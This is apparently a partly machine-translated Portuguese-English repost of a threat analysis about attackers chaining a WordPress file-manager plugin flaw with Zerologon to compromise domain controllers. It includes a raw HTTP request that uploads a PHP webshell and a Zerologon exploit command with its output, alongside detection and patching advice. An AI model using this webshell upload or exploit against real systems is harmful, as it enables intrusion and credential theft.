Usando uma falha do WordPress para aproveitar a vulnerabilidade do Zerologon e atacar os Controladores de Domínio das empresas

Views: 144
0 0
Read Time:6 Minute, 58 Second

Usando uma falha do WordPress (plugin file-manager-CVE-2020-25213) para aproveitar o Zerologon (CVE-2020-1472) e atacar os Controladores de Domínio das empresas.

Recentemente, uma vulnerabilidade crítica chamada Zerologon – CVE-2020-1472 – tornou-se um assunto de tendência em todo o mundo.

Essa vulnerabilidade permitiria que um agente mal-intencionado com uma base em sua rede interna se tornasse essencialmente administrador de domínio com apenas um clique. Este cenário é possível quando a comunicação com o Controlador de Domínio pode ser realizada do ponto de vista do invasor.

Embora a comunicação com a rede interna e o Controlador de Domínio só possa ser feita na intranet, muitas redes possuem políticas fracas e uma arquitetura ruim baseada na segregação e segmentação da rede, o que permite, por exemplo, que os servidores web – localizados na DMZ – também possam se comunicar internamente com os ativos internos da rede e com os Controladores de Domínio. Em detalhes, a segmentação da rede envolve a particionamento de uma rede em redes menores; enquanto a segregação da rede envolve o desenvolvimento e a aplicação de um regulamento para o controle das comunicações entre hosts e serviços específicos.

Para aproveitar essas possíveis falhas, os agentes externos têm abusado de uma vulnerabilidade no plugin File-Manager – CVE-2020-25213 que permite a execução de código arbitrário na vulnerabilidade do lado do servidor (RCE). A figura 1 abaixo enfatiza o problema aqui explicado.

Figura 1: Diagrama de fluxo de trabalho da exploração da caixa preta para o Controlador de Domínio hashes NTLM despejado via CVE-2020-25213 e CVE-2020-1472.

De acordo com o WordFence, em 4 de setembro de 2020, foram registrados ataques em mais de 1,7 milhão de sites, e até hoje, 10 de setembro de 2020, o número total de locais atacados aumentou para mais de 2,6 milhões. Enquanto isso, o CVE-2020-25213 que afeta o plugin WP-Manager WordPress continua a ser explorado por criminosos.

De acordo com o pesquisador de segurança,enviei uma red writeup e POC para o plugin vulnerável para o autor do projeto, mas não o recebi nenhuma resposta, e meu post privado foi excluído. http://elFinder.py problema é uma vulnerabilidade comum com tantos scripts na internet… meu script só muda para o caminho “wp-content”.

Código de exploração – GitHub

Figura 2: PoC – CVE-2020-25213.

Depois de usar a exploração, um web-shell pode ser executado no servidor que executa o site vulnerável WordPress. O pedido de berrando demonstra como esse ataque poderia ser realizado.

POST /wordpress/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1Host : x.x.x.User-Agent : curl/7.68.0Accept-Encoding : gzip, deflateAccept : */*Connection: closeContent-Type: multipart/form-data; boundary=------------------------66e3ca93281c7050Expect: 100-continueContent-Length: 1694-------------------------- 66e3ca93281c7050 Content-Disposition: form-data; name="cmd"upload-------------------------- 66e3ca93281c7050 Content-Disposition: form-data; name="target"l1_Lw-------------------------- 66e3ca93281c7050 Content-Disposition: form-data; name = "upload []" ; filename = "shell.php"Content-Type: image/png<? php system($ _GET[ "cmd" ]);?> -------------------------- 66e3ca93281c7050--

Os dados exfiltrados do servidor web (/etc/arquivo passwd) e um shell remoto podem ser usados para tirar proveito desse cenário.

Figura 3: Exfiltração do arquivo /etc/passwd via CVE-2020-25213.

A partir daqui, estabelecer uma concha remota e de alta priviledge pode ser uma tarefa fácil. Vários grupos de ameaças abusaram dessa vulnerabilidade para criar uma base inicial na rede interna e realizar movimentos laterais.

Como essa vulnerabilidade tem sido abusada por criminosos

Desde os últimos dias, o SI-LAB observou que os criminosos abusaram dessa falha nas situações mais diversas, ou seja:

  • Para disseminar a campanha de phishing e fornecer malware na natureza;
  • Implantar backdoors para roubar dados, informações de cartão de crédito ou informações confidenciais (PII);
  • Para adicionar criptominers (scripts java) ao código-fonte dentro de páginas específicas (por exemplo, index.php); E
  • Para aumentar na rede interna e abusar da vulnerabilidade zerologon para atacar controladores de domínio.

Durante a análise de alguns sistemas comprometidos, o SI-LAB coleta alguns implantes maliciosos retratados e explicados abaixo.

Figura 4: Script cryptominer encontrado em vários sites comprometidos do WordPress.

Em detalhes, cada arquivo header.php de todos os modelos WordPress instalados e analisados (Figura 5), o criptominer mostrado na Figura 4 foi adicionado. Note que toda a cadeia maliciosa foi automatizada pelo autor da ameaça – “10 de setembro de 2020, o número total de sites atacados aumentou para mais de 2,6 milhões, disse o WordFence.

Figura 5: WordPress header.php arquivo com o script cryptominer harcoded.

Em outros sistemas, outros tipos de scripts foram encontrados, ou seja, webshells, e também remetentes SMTP para alavancar campanhas de engenharia social (Figura 6).

Figura 6: Remetentes SMTP usados por criminosos para alavancar campanhas de engenharia social.

Também foram observados scripts autopwn – o que confirma que o processo de exploração foi automatizado por bandidos.

Figure 7: Autopwn scripts used by crooks to explore CVE-2020-25213 vulnerability.

Other interesting implant, and also documented by WordFence, concerns a piece of code added in the compromised systems, and which essentially sent the user’s credentials to a Telegram channel managed by the criminal when an user authentication is made in the WordPress panel.

Figure 8: Snipet of code that sent sensitive information to a Telegram chanel.

The threat author potentially identified on the websites analyzed (in Portugal), is related to that identified by WordFence.

According to WordFence, “If your site has been compromised by the “bajatax” threat actor, it is critical that you completely clean your site before contacting all of your users and advising them that their credentials may have been compromised, especially if you are running an e-commerce site.

In other, more specific cases, it was also noted that some threat actors used this vulnerability to leverage the Zerologon vulnerability. After the initial foothold, and when poor network segmentation is present, a lateral movement on the nework based on a pivot attack is possible.

Using the compromised machine as a pivot, exploiting the Doman Controller is real, and an organization can suffer a huge loss from this type of scenario. Breaking a domain controller is like breaking a computer network.

More, , it is possible to exfiltrate NTLM hashes from the Domain Controller, including Domain Admin hashes, and access all the machines registered in the domain through a Pass-the-Hash attack.python3 cve-2020-1472-exploit.py DOMAIN_NAME 192.168.x.xPerforming authentication attempts…===========================================================================================================================================================================================================================================Target vulnerable, changing account password to empty stringResult: 0Exploit complete!

Figure 9: Domain Controller NTLM hashes exfiltration via CVE-2020-1472.

Final Thoughts

Zerologon has been the hot topic of the recent days, and as a result, other vectors have been less highlighted. As it was possible to analyze throughout this analysis, criminals have taken advantage of web vulnerabilities, in this case the CVE-2020-25213 associated to the WordPress WP-Manager plugin to obtain a privileged shell in internal networks.

Network reconnaissance has been carried out via lateral movement, Domain Controllers have been identified and explored with Zerologon. This vulnerability is critical and is based on an encryption flaw, and allows changing the account machine password to empty.

Figure 10: Zerologon flaw (https://www.cynet.com/zerologon/).

Finally, the Domain Controller NTML hashes can then be exfiltrated remotely. Note that the machine password must be restored quickly, otherwise the DCs will not synchronize and this can break the network.

Cynet also released details for some critical artifacts that can be used to detect active exploitation of the vulnerability, including a specific memory pattern in lsass.exe memory and an abnormal spike in traffic between lsass.exe.

windows server

Figure 11: Zerologon detection (https://www.cynet.com/zerologon/).

“The most documented artifact is Windows Event ID 4742 ‘A computer account was changed’, often combined with Windows Event ID 4672 ‘Special privileges assigned to new logon’.”

Para permitir que os usuários do Windows Server detectem rapidamente ataques relacionados, especialistas também lançaram a regra YARA que pode detectar ataques ocorridos antes de sua implantação, enquanto para monitoramento em tempo real é uma ferramenta simples também está disponível para download.

No entanto, para corrigir completamente o problema, os usuários ainda recomendam instalar a última atualização de software da Microsoft o mais rápido possível.

FONTE: SECURITY AFFAIRS

Previous post Verizon Payment Security Report é uma chamada de despertar: hora de refocar na conformidade PCI DSS
Next post CISOs lutam para acompanhar a estrutura MITRE ATT&CK

Deixe um comentário